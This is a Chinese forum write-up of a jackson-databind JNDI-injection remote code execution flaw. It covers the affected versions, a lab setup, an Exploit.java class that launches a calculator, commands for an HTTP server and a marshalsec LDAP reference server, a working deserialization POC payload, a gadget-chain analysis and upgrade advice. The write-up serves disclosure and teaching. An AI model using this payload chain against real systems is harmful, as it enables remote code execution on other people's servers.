Jackson-databind漏洞分析与利用：JDNI注入导致的RCE漏洞及修复建议-山海云端论坛

影响范围

jackson-databind before 2.9.10.4
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7

漏洞类型

JDNI注入导致RCE

利用条件

开启enableDefaultTyping()
使用了com.nqadmin.rowset.JdbcRowSetImpl第三方依赖

漏洞概述

com.nqadmin.rowset.JdbcRowSetImpl类绕过了之前jackson-databind维护的黑名单类，并且JDK版本较低的话，可造成RCE。

漏洞复现

环境搭建

Step 1：新建Meaven项目：

Step 2：修改pom.xml，添加以下依赖

  <dependencies>
    <dependency>
      <groupId>com.fasterxml.jackson.core</groupId>
      <artifactId>jackson-databind</artifactId>
      <version>2.9.10.4</version>
    </dependency>

    <!-- https://mvnrepository.com/artifact/com.pastdev.httpcomponents/configuration -->
  <dependency>
      <groupId>com.nqadmin.rowset</groupId>
      <artifactId>jdbcrowsetimpl</artifactId>
      <version>1.0.1</version>
  </dependency>
    <dependency>
      <groupId>org.slf4j</groupId>
      <artifactId>slf4j-nop</artifactId>
      <version>1.7.2</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
      <dependency>
          <groupId>javax.transaction</groupId>
          <artifactId>jta</artifactId>
          <version>1.1</version>
      </dependency>
  </dependencies>

漏洞利用

这里使用LDAP的利用方式进行漏洞的利用演示，RMI的方式也是类似的，且RMI比LDAP要对JDK版本有很大的局限性~

LDAP利用方式：jdk版本：JDK 11.0.1、8u191、7u201、6u211之前，笔者这里采用JDK 1.8.0_181

编译Exploit.java

Exploit.java代码如下：

import java.lang.Runtime;

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

编译Exploit.java文件：

搭建HTTP服务

使用Python搭建简易SimpleHTTPServer服务：

python -m  SimpleHTTPServer 4444

搭建LDAP服务

使用marshalsec来启动一个LDAP服务：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:4444/#Exploit 1099

执行漏洞POC

Poc.java代码如下所示：

import com.fasterxml.jackson.databind.ObjectMapper;

public class POC {
    public static void main(String[] args) throws Exception {
        String payload = "[\"com.nqadmin.rowset.JdbcRowSetImpl\",{\"dataSourceName\":\"ldap://127.0.0.1:1099/Exploit\",\"autoCommit\":\"true\"}]";
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        mapper.readValue(payload, Object.class);
    }
}

之后运行该程序，成功执行命令，弹出计算器：

漏洞分析

首先定位到com.nqadmin.rowset.JdbcRowSetImpl类，之后根据POC全局搜索dataSourceName，发现在setDataSourceName处调用，此时我们的DataSourceName因为没有进行初始化所以当前为null，之后进入else中调用父类的setDataSourceName函数，之后继续跟进：

可以看到在父类的setDataSourceName中只是对dataSource进行了赋值而已，并无其他的操作，那么如何导致的RCE呢？带着疑问我们来看payload中的第二个参数：

第二个参数提供了一个autoCommit，之后全局搜索autoCommit发现在setautoCommit处被调用，而此时的conn未被初始化所以为null，进而进入else语句中，之后会执行一次this.connect()，下面我们跟进来看看：

之后在this.connect中发现一处可疑的JNDI注入，而此时的参数为”this.getDataSourceName”：

该参数来自我们刚刚设置的DataSourceName，进而此处的JNDI注入参数可控，可以利用实现RCE:

整个利用链如下所示：

mapper.readValue
    ->com.nqadmin.rowset.JdbcRowSetImpl.setDataSourceName
        ->javax.sql.rowset.BaseRowSet.setDataSourceName
          ->com.nqadmin.rowset.JdbcRowSetImpl.setAutoCommit
              ->this.connect()
            ->(DataSource)ctx.lookup(this.getDataSourceName())

修复建议

及时将jackson-databind升级到安全版本
升级到较高版本的JDK

版权声明 1 本网站名称：山海云端-专注于PHP与网络安全
2 本站永久网址：www.shserve.cn
3 本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长 QQ1790643379进行删除处理。
4 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5 本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6 本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END